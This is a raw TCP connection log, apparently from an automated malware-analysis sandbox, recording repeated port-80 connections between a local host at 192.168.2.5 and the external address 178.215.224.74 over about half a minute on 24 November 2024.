                                      Nov 24, 2024 12:05:38.344733000 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.344774961 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.345822096 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.345993042 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.346036911 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.346898079 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.347018957 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.347063065 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.348083019 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.348109007 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.348150015 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.349201918 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.349322081 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.349359989 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.350342035 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.350469112 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.350507021 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.351512909 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.351655006 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.351695061 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.352699041 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.352803946 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.352842093 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.353837013 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.353934050 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.353974104 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.354985952 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.355076075 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.355118990 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.356163979 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.356228113 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.356267929 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.357331991 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.357428074 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.357486963 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.358484030 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.358661890 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.358704090 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.359607935 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.359690905 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.359728098 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.360747099 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.360832930 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.360871077 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.361890078 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.362005949 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.362045050 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.363233089 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.363343000 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.363382101 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.364203930 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.364329100 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.364367962 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.365355968 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.365473986 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.365515947 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.366503000 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.366622925 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.366660118 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.367676020 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.367799044 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.367837906 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.368819952 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.368917942 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.368959904 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.370080948 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.370162964 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.370209932 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.371253967 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.371499062 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.371540070 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.372278929 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.372417927 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.372461081 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.373420000 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.373667955 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.373714924 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.374602079 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.374722958 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.374763012 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.375747919 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.375864983 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.375904083 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.376899004 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.377012968 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.377053976 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.378060102 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.378201962 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.378242970 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.379378080 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.379465103 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.379509926 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.380415916 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.380551100 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.380589962 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.381505013 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.381611109 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.381649971 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.382671118 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.382788897 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.382832050 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.383805037 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.383920908 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.383963108 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.385008097 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.385073900 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.385114908 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.386111021 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.386238098 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.386280060 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.387242079 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.387340069 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.387382030 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.388447046 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.388560057 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.388602972 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.389569998 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.389694929 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.389735937 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.390718937 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.390831947 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.390873909 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.391813040 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.435472965 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.536534071 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.536667109 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.536700964 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.537081003 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.537234068 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.537281990 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.538274050 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.538383961 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.538424015 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.539355040 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.539486885 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.539534092 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.540690899 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.540803909 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.540843964 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.541735888 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.541851044 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.541888952 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.542870045 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.543066978 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.543107986 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.543986082 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.544123888 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.544162035 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.545156956 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.545262098 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.545310020 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.546405077 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.546607018 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.546646118 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.547430992 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.547544003 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.547585964 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.548924923 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.549001932 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.549041986 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.550017118 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.550143003 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.550190926 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.551143885 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.551271915 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.551316977 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.615917921 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:38.737504005 CET8049899178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:38.737564087 CET4989980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:40.299890995 CET4991580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:40.419764042 CET8049915178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:40.419887066 CET4991580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:40.454709053 CET4991580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:40.574327946 CET8049915178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:41.692329884 CET8049915178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:41.696832895 CET4991580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:41.816596031 CET8049915178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:41.816675901 CET4991580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:42.500114918 CET4992080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:42.619641066 CET8049920178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:42.619723082 CET4992080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:42.619935989 CET4992080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:42.739382029 CET8049920178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:43.955971003 CET8049920178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:43.972419024 CET4992080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:44.092576981 CET8049920178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:44.092637062 CET4992080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:44.506678104 CET4992580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:44.626240969 CET8049925178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:44.626343966 CET4992580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:44.626692057 CET4992580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:44.748336077 CET8049925178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:45.929018974 CET8049925178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:45.934092999 CET4992580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.054832935 CET8049925178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:46.055001974 CET4992580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.121279001 CET4986480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.121773958 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.240932941 CET8049864178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:46.241255045 CET8049930178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:46.241336107 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.246402979 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:46.365907907 CET8049930178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:47.596132040 CET8049930178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:47.596193075 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:47.730566025 CET4993480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:47.850940943 CET8049934178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:47.851033926 CET4993480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:47.851183891 CET4993480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:47.970616102 CET8049934178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:49.114867926 CET8049934178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:49.115392923 CET4993480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:49.235156059 CET8049934178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:49.240782022 CET4993480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:49.339838982 CET4993980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:49.459399939 CET8049939178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:49.459465027 CET4993980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:49.459774971 CET4993980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:49.579298973 CET8049939178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:50.818061113 CET8049939178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:50.818526983 CET4993980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:50.932653904 CET4994480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:50.938693047 CET8049939178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:50.938752890 CET4993980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:51.052237988 CET8049944178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:51.052320957 CET4994480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:51.052460909 CET4994480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:51.172040939 CET8049944178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:52.362545967 CET8049944178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:52.363090038 CET4994480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.483239889 CET8049944178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:52.483340979 CET4994480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.547252893 CET4994780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.601551056 CET8049930178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:52.604760885 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.666922092 CET8049947178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:52.669934988 CET4994780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.670052052 CET4994780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:52.789511919 CET8049947178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:53.976739883 CET8049947178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:53.977163076 CET4994780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:54.096983910 CET8049947178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:54.097062111 CET4994780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:56.168642998 CET4995780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:56.288332939 CET8049957178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:56.288436890 CET4995780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:56.294596910 CET4995780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:56.414329052 CET8049957178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:57.614417076 CET8049957178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:57.645301104 CET4995780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:57.765151978 CET8049957178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:57.765213013 CET4995780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:59.397743940 CET4996480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:59.517467976 CET8049964178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:05:59.519514084 CET4996480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:59.524944067 CET4996480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:05:59.646747112 CET8049964178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:00.794481039 CET8049964178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:00.795097113 CET4996480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:00.915162086 CET8049964178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:00.915235043 CET4996480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.184719086 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.189213037 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.304337025 CET8049970178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:01.304410934 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.304518938 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.308933973 CET8049971178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:01.309004068 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.309434891 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:01.424175024 CET8049970178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:01.428916931 CET8049971178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:02.564130068 CET8049970178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:02.575341940 CET8049971178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:02.622961998 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.781409025 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.786526918 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.812752008 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.906590939 CET8049970178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:02.907668114 CET4997080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.928185940 CET4993080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.928538084 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.932868004 CET8049971178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:02.932929039 CET4997180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:02.988946915 CET4997780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:03.049581051 CET8049930178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:03.049843073 CET8049976178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:03.050041914 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:03.063842058 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:03.108979940 CET8049977178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:03.112807989 CET4997780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:03.113019943 CET4997780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:03.186641932 CET8049976178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:03.232536077 CET8049977178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:04.363940001 CET8049977178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:04.364451885 CET4997780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:04.381767035 CET8049976178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:04.381838083 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:04.484586000 CET8049977178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:04.487704992 CET4997780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:05.023466110 CET4997980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:05.142990112 CET8049979178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:05.143059969 CET4997980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:05.154268026 CET4997980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:05.302722931 CET8049979178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:05.937783957 CET4998580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.062596083 CET8049985178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.062803030 CET4998580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.076149940 CET4998580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.195792913 CET8049985178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.410665989 CET8049979178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.420274973 CET4997980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.540251017 CET8049979178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.540307999 CET4997980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.714757919 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.715029955 CET4998680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.889573097 CET8049986178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.889585018 CET8049976178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:06.889674902 CET4997680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.889679909 CET4998680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:06.920037985 CET4998680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:07.129201889 CET8049986178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:07.327986956 CET8049985178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:07.328500986 CET4998580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:07.448725939 CET8049985178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:07.448788881 CET4998580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.115524054 CET4999180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.235053062 CET8049991178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:08.235130072 CET4999180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.235279083 CET4999180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.264122009 CET8049986178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:08.264206886 CET4998680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.354737043 CET8049991178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:08.624407053 CET4999380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.744379997 CET8049993178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:08.744484901 CET4999380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.748045921 CET4999380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:08.867566109 CET8049993178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:09.594404936 CET8049991178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:09.594935894 CET4999180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:09.714663982 CET8049991178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:09.714725018 CET4999180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:10.095940113 CET8049993178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:10.096391916 CET4999380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:10.216481924 CET8049993178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:10.216572046 CET4999380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:11.084012032 CET4999980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:06:11.203486919 CET8049999178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:06:11.203600883 CET4999980192.168.2.5178.215.224.74
